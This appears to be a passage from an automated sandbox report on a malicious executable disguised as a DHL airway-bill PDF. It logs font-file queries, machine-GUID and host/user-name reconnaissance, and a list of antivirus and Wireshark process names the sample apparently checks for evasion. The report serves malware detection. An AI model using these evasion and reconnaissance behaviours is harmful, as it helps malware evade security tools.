            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 11_2_00418137 GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, | 11_2_00418137
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 11_2_004083A1 GetVersionExW, | 11_2_004083A1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 24_2_004073B6 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, | 24_2_004073B6
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: bdagent.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: MSASCui.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: avguard.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: avgrsx.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: avcenter.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: avp.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: zlclient.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
